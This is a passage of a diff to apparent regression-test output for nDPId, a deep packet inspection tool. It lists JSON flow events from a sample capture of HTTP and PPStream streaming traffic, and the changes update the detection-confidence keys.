00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1467353202192,"flow_last_seen":1467353202428,"flow_idle_time":7580000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":3039,"flow_avg_l4_payload_len":607,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -505,33 +505,33 @@ 00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1467353136440,"flow_last_seen":1467353136952,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":12973,"flow_avg_l4_payload_len":288,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"219.228.107.156","src_port":22793,"dst_port":1250,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.233.39.81","src_port":22793,"dst_port":18590,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.233.39.81","src_port":22793,"dst_port":18590,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353138931,"flow_last_seen":1467353139050,"flow_idle_time":7580000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":671,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353138931,"flow_last_seen":1467353139050,"flow_idle_time":7580000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":671,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136838,"flow_last_seen":1467353136838,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.133.182","src_port":22793,"dst_port":17788,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136838,"flow_last_seen":1467353136838,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.133.182","src_port":22793,"dst_port":17788,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165563,"flow_last_seen":1467353165659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":379,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353144819,"flow_last_seen":1467353144913,"flow_idle_time":7580000,"flow_min_l4_payload_len":229,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":619,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165563,"flow_last_seen":1467353165659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":379,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353144819,"flow_last_seen":1467353144913,"flow_idle_time":7580000,"flow_min_l4_payload_len":229,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":619,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.227.170.88","src_port":22793,"dst_port":20227,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.227.170.88","src_port":22793,"dst_port":20227,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"121.248.133.93","src_port":22793,"dst_port":12757,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"121.248.133.93","src_port":22793,"dst_port":12757,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195852,"flow_last_seen":1467353195956,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195852,"flow_last_seen":1467353195956,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.112.31.89","src_port":22793,"dst_port":29072,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.112.31.89","src_port":22793,"dst_port":29072,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196104,"flow_last_seen":1467353196204,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":1010,"flow_avg_l4_payload_len":505,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196393,"flow_last_seen":1467353196523,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":678,"flow_avg_l4_payload_len":339,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196104,"flow_last_seen":1467353196204,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":1010,"flow_avg_l4_payload_len":505,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196393,"flow_last_seen":1467353196523,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":678,"flow_avg_l4_payload_len":339,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.41.144.153","src_port":22793,"dst_port":10492,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.41.144.153","src_port":22793,"dst_port":10492,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.223.204.67","src_port":22793,"dst_port":11102,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.223.204.67","src_port":22793,"dst_port":11102,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353167288,"flow_last_seen":1467353167373,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":785,"flow_avg_l4_payload_len":392,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157433,"flow_last_seen":1467353157718,"flow_idle_time":7580000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":463,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":420,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353170523,"flow_last_seen":1467353171307,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":594,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353190892,"flow_last_seen":1467353190978,"flow_idle_time":7580000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":443,"flow_tot_l4_payload_len":557,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195855,"flow_last_seen":1467353195998,"flow_idle_time":7580000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196348,"flow_last_seen":1467353199417,"flow_idle_time":7580000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353167288,"flow_last_seen":1467353167373,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":785,"flow_avg_l4_payload_len":392,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157433,"flow_last_seen":1467353157718,"flow_idle_time":7580000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":463,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":420,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353170523,"flow_last_seen":1467353171307,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":594,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353190892,"flow_last_seen":1467353190978,"flow_idle_time":7580000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":443,"flow_tot_l4_payload_len":557,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195855,"flow_last_seen":1467353195998,"flow_idle_time":7580000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196348,"flow_last_seen":1467353199417,"flow_idle_time":7580000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353136483,"flow_last_seen":1467353136483,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"183.228.182.44","dst_ip":"192.168.115.8","src_port":13913,"dst_port":22793,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 